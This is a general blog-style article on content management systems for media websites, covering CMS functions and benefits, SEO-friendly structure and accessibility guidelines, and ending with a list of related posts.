The term “content management system” refers to a software application that allows users to create, publish, and edit content. Content files stored in a CMS are saved in a database and displayed in layers based on a collection of templates, similar to how a webpage works.

****CMS’s common functions include the following:****

*   It improves the digital experience.
*   It enables users to generate and format information with ease.
*   CMS keeps files in a single location, making it easy for users to find them.
*   It enables authorized users to manage information based on their roles, such as managers, editors, and authors.
*   The software notifies the user when and where the content was released.

****Benefits of CMS****

Multiple authorized personnel can view, edit, schedule, and manage the content that will be published. It offers a user-friendly experience, especially for those who are not technically savvy, allowing them to quickly create and manage their own content.

CMS is cost-effective because it eliminates the need for front-end developers to make changes to the website, allowing users to easily publish content and promoting a digital experience for both visitors and editors. It simplifies and streamlines content distribution to other platforms.

Businesses must implement a dependable and simple CMS for managing media sites, which allows for easy content creation, editing, and posting.

CMS allows you to easily categorize articles and organize media resources and assets.

****Structure that is SEO-Friendly.****

Ensure that your website follows the best SEO practices. Meta descriptions, appropriate heading tags, keywords, and other SEO-friendly content were used. It enables your website to become visible and attract organic traffic.

A rational web structure attracts users while also making it easy for search engines to index and scan your website. To begin, the following are the most important elements:

*   Focus on scannability.
*   Give clear calls to action.
*   Use your website’s header wisely.
*   Maximize the visual hierarchy guidelines.
*   Create SEO-friendly URLs for search engines.
*   Create a high-quality user experience (UI).
*   Use keywords to organize your web page layout.

****Accessibility****

Accessibility is a feature found on high-quality multimedia websites. This feature ensures that all users, including those with disabilities, can easily navigate your website. Accessibility benefits both mobile device users and those with slow internet access. 

****Here’s how to implement accessibility:****

Follow the “Web Content Accessibility Guidelines” to ensure that your website is accessible to people with disabilities, such as those who struggle with their vision or hearing.

Accessibility practices should be implemented from the start of the project and tested as needed. If it is not completed soon, it may result in higher future expenses.

****Conclusion****

Web development and social media are extremely effective tools for any business. However, when the two technologies are combined, their ability to drive business growth may improve. Employing and combining appropriate web development and social media content practices can help improve company recognition, attract visitors, generate conversions, and strengthen brand reliability and consumer loyalty.

Not only should their capabilities be combined, but maintaining high standards in web development for media sites is critical to staying current with technology trends and making all activities smoother and more seamless, increasing productivity and efficiency.

Remember that maintaining high-quality web development for media websites is an ongoing process. Regularly checking your site’s operation, soliciting user feedback, and keeping up with the latest web development trends are all important ways to improve your media site.

1.  Is CSS Necessary for Responsive Web Design?
2.  5 Best CAPTCHA Plugins for WordPress Websites
3.  5 Effective Web Design Strategies to Increase Your ROI
4.  5 must-try user flow diagramming tools for UX designing
5.  Embracing Minimalism: “Less is More” Approach in UI/UX Design

Tag

#git